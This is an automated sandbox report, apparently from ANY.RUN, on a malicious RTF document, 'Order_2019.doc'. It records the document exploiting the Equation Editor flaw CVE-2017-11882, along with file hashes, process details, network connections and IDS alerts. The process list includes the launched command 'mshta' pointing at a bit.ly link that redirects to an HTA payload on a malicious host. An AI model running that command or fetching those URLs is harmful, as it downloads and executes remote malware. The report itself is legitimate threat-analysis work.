analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Order_2019.doc

Full analysis: https://app.any.run/tasks/03d7d4ff-63b3-42a9-ae21-cd1c5d27fbf6
Verdict: Malicious activity
Analysis date: January 22, 2019, 16:02:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

22EBD840CF4B8C030E7E6168273D84C6

SHA1:

2B85F1AD5C9755395926EF9944E0F0EEC6B3763D

SHA256:

8A17AFC5FCBE7A062907204ECDF5B7D01F1D43ECC5ACCAEB67FC2E095034E461

SSDEEP:

12288:c6mRWR66RRRRRRRm6lyEKIN25DSKHnHWH:c6mRi66RRRRRRRm6lyEKIN25DSKHnHWH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3024)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 3704)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3648)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3024)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3648)
    • Reads internet explorer settings

      • mshta.exe (PID: 3704)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3024)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Windows User
LastModifiedBy: Windows User
CreateDate: 2019:01:11 17:48:00
ModifyDate: 2019:01:11 17:49:00
RevisionNumber: 1
TotalEditTime: 1 minute
Pages: 3
Words: 1179
Characters: 6722
CharactersWithSpaces: 7886
InternalVersionNumber: 85
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
3648"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Order_2019.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3024"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3704mshta http://bit.ly/2MaNhs9 &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
1 258
Read events
592
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8B4E.tmp.cvr
MD5:
SHA256:
3648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:AAE1C2D4D78E2C14FB6414A9B1FFAAB5
SHA256:B7D225F520897E5D557DB320305710B84DB85F26ABE613DA8D4021E82E5226D8
3648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1BABA04707AB12BA400D13BF13DF9EB0
SHA256:9E9340FC8C3E5353301809E9355F5D80A2A8886C35A912126785F717755A3985
3704mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:12E7EFCAA669892E64E38525B651F93B
SHA256:1D4DC3490128EF422BA8F11401A3612154CFB99196F350878423B27906DBDAAA
3648WINWORD.EXEC:\Users\admin\Desktop\~$der_2019.doc.rtfpgc
MD5:0EBB998861D4BF5DC51EA1D9915F8CF3
SHA256:2A8F9AC16AA0BD297898F768F3286E983627BCA0A9134F941E9A5A6D4BF7D92B
3648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Order_2019.doc.rtf.LNKlnk
MD5:C05744FF05A9C967B66988C8055F96F2
SHA256:DD780B71F5272C593F7B054734E4C38F760633141EA50AC5CC5B0BD5C44FA614
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3704
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/2MaNhs9
US
html
125 b
shared
3704
mshta.exe
GET
404
94.73.146.167:80
http://vektorex.com/cgii/kkbReport.hta
TR
html
657 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3704
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
3704
mshta.exe
94.73.146.167:80
vektorex.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
vektorex.com
  • 94.73.146.167
unknown

Threats

PID
Process
Class
Message
3704
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
3704
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object
3704
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object
3704
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
3704
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3704
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
No debug info